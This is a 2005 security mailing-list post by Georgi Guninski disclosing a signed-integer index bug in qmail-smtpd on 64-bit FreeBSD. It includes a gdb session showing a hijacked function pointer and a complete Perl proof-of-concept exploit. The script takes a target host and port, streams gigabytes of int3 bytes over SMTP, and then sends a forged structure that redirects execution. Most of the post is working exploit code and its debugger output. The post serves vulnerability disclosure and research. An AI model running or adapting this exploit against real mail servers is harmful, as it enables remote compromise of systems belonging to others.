Message-ID: <20050515124849.GC5201@sivokote.iziade.m$>
Date: Sun May 15 13:48:39 2005
From: guninski at guninski.com (Georgi Guninski)
Subject: 64 bit qmail fun
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
>
> 2. pointer + signed int in commands.c
> int i;
> ...
> i = str_chr(cmd.s,' ');
> ...
> cmd.s[i] = 0;
>
problem #2 is exploitable at least on freebsd 5.4 amd64 with a lot of
virtual memory.
djb's original qmail was compiled with debug info, no optimizations, and not
stripped.
Breakpoint 1, commands (ss=0x507520, c=0x507540) at commands.c:34
34 cmd.s[i] = 0;
(gdb) p cmd
$12 = {s = 0x4b507000 '?' <repeats 200 times>..., len = 3036683527,
^^^^^^^^^^
a = 3184650962}
(gdb) p i
$13 = -1258283773
(gdb) p &cmd.s[i]
$14 = 0x508d03 "K"
(gdb) next
36 for (i = 0;c[i].text;++i) if (case_equals(c[i].text,cmd.s)) break;
(gdb) p cmd
$15 = {s = 0x507000 " server failed (#4.4.2)", len = 3036683527,
^^^^^^^^^^^^^
a = 3184650962}
(gdb) p &ssout
$16 = (substdio *) 0x507500
(gdb) p &ssout.op
$17 = (int (**)()) 0x507518
(gdb) cont
Program received signal SIGTRAP, Trace/breakpoint trap.
0x000000000050cbac in ?? ()
(gdb) x/i $rip
0x50cbac: int3
(gdb) p ssout
$18 = {
x = 0x102030405060708 <Error reading address 0x102030405060708: Bad address>, p = 0, n = 32, fd = 2, op = 0x50cbab}
(gdb) info stack
#0 0x000000000050cbac in ?? ()
#1 0x0000000000405bce in allwrite (op=0x50cbab, fd=2,
buf=0x102030405060708 <Error reading address 0x102030405060708: Bad address>, len=16) at substdo.c:15
#2 0x0000000000405c63 in substdio_flush (s=0x507500) at substdo.c:35
#3 0x0000000000405d6e in substdio_put (s=0x507500,
buf=0x406988 "502 unimplemented (#5.5.1)\r\n", len=28) at substdo.c:64
#4 0x0000000000405efc in substdio_puts (s=0x507500,
buf=0x406988 "502 unimplemented (#5.5.1)\r\n") at substdo.c:100
#5 0x0000000000400daf in out (s=0x406988 "502 unimplemented (#5.5.1)\r\n")
at qmail-smtpd.c:43
#6 0x0000000000400f13 in err_unimpl () at qmail-smtpd.c:54
(gdb) x/i helohost.s
0x50c000: int3
(gdb) p &cmd
$19 = (stralloc *) 0x508d00
qmlong-pubvvv5.pl - run on freebsd 5.4 amd64
------------------------
#!/usr/bin/perl -w
# copyright georgi guninski
# cannot be used in vulnerability databases
#
# Proof of concept for the signed-int index bug in qmail's commands.c
# quoted above (cmd.s[i] = 0 with a negative i), as run against the
# FreeBSD 5.4 amd64 build in the gdb session above.  All the constants
# below are taken from that session and are specific to that binary/run.
# The precondition is the sheer input volume (several GB in two SMTP
# lines) -- hence the "a lot of virtual memory" remark above; presumably a
# memory limit on the smtpd process removes it -- confirm.
# NOTE(review): no `use strict`; only -w is in effect.
use IO::Socket;
# Target defaults to localhost:25, overridable from the command line.
my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;
my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");
#my $sock;
#open ($sock, '+>',"/dev/null") || die("open");
##my $wriaddr = 0xb5bfa660 - 0x140;
# Two byte counts, each split into whole MiBs plus a remainder so the send
# loops below can stream 1 MiB at a time:
#   $headdr  - bytes sent as the HELO argument;
#   $wriaddr - bytes sent on the following command line.
my $wriaddr = 0xb5001e43 - 0x140;
my $wrimeg = int($wriaddr/(1024*1024)) ;
my $wrioff = $wriaddr % (1024*1024) ;
my $headdr = 0x42aa6000;
my $heameg = int($headdr/(1024*1024));
my $heaoff = $headdr % (1024*1024);
print $wrimeg . " " . $wrioff;
# 1 MiB of 0xCC (int3) -- the instruction gdb shows at $rip and in
# helohost.s in the session above.
my $payload="\xcc" x (1024*1024);
my $i=0;
# Phase 1: "HELO " followed by $headdr bytes (whole MiBs of $payload, then
# the remainder as 'v'), terminated by CRLF.  Progress is printed per MiB.
print $sock "HELO ";
while(42)
{
print $sock $payload;
$i++;
print "${i}\n";
if ($i == $heameg) {last;}
}
print $sock "v" x $heaoff;
print $sock "\r\n";
print "\nHELO sent\n";
$i=0;
# Phase 2: a second command line of $wriaddr bytes, same streaming scheme.
while(42)
{
print $sock $payload;
$i++;
print "${i}\n";
if ($i == $wrimeg) {last;}
}
# Remainder of phase 2.  The space is presumably what str_chr(cmd.s,' ')
# finds, so cmd.s[i] = 0 lands there (the breakpoint in the session above).
my $zer1 = "v" x $wrioff . " vvv\r\n";
print $zer1;
print $sock $zer1;
print "\nspace/zero sent\n";
$i=0;
# Phase 3: 0x500 bytes of filler, then a substdio image laid out to match
# the `p ssout` dump above (x, p, n, fd, then op; on amd64 the 0x42 fills
# the padding between fd and op).  n = 0x20 = 32, fd = 2 and op = 0x50cbab
# are the values gdb shows, and op is what allwrite() ends up calling
# according to the "info stack" output.
my $vvover= "AB" . ("v" x (0x500-2));
$vvover .= pack("Q",0x0102030405060708); #x
$vvover .= pack("I",0x10);
$vvover .= pack("I",0x20);
$vvover .= pack("I",0x2);
$vvover .= pack("I",0x42);
$vvover .= pack("Q",0x50cbab); #op
$vvover .= "\x21" . "\n" x 100;
## ^^^ ssin.x + 1
print $sock $vvover;
print "\nprobably done\n";
# Busy-wait so the connection stays open after the last send; this spins
# at 100% CPU until the script is killed.
while(42) {};
--
where do you want bill gates to go today?